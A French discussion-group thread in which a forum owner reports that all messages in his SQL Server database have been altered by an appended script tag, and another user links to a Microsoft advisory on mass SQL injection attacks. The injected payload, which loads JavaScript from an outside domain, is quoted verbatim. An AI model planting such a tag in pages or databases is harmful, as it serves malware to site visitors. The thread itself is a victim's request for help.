à l'aide ! ">

lefloch
bonjour.

depuis hier soir, tous les messages enregistrés dans ma base de données SQL
Serveur se trouvent complétés par "></title><script
src="http://1.verynx.cn/w.js"></script><!--
comme il s'agit de messages destinés à un forum de discussion, ça fout la
grouille dans l'affichage.
quand je cherche ça sur google, je trouve les milliers de messages infectés
référencés par google mais pas la solution.
si quelqu'un pouvait m'aider, ce serait sympa !
je pense que la question doit trouver une réponse sur ce groupe mais excusez
moi de chercher un raccourci.

bonne journée à vous.

boris ryser
"lefloch" a écrit dans le message de
[...]

Des centaines de sites se sont vus infectés.
microsoft en parle ici
http://www.microsoft.com/belux/technet/fr/security/advisory/954462.mspx

boris ryser
boris ryser
bonjour.

depuis hier soir, tous les messages enregistrés dans ma base de données
SQL

http://www.microsoft.com/belux/technet/fr/security/advisory/954462.mspx

Avis de sécurité Microsoft (954462)
Augmentation des attaques par injection SQL exploitant des entrées de
données utilisateur non vérifiées

bon travail
boris ryser
lefloch
merci pour cette info.
quelqu'un a une idée de la man,ière dont se fait l'intrusion ?
en gros, comment se protéger ?

4885c56d$